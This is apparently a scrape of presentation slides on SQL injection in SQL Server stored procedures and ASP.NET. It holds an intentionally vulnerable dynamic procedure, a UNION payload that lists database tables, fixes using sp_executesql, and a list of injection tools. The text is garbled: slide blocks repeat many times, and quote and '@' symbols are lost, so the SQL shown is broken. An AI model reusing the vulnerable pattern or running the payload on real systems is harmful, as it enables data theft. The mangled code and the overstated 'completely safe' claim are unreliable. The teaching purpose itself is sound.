Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom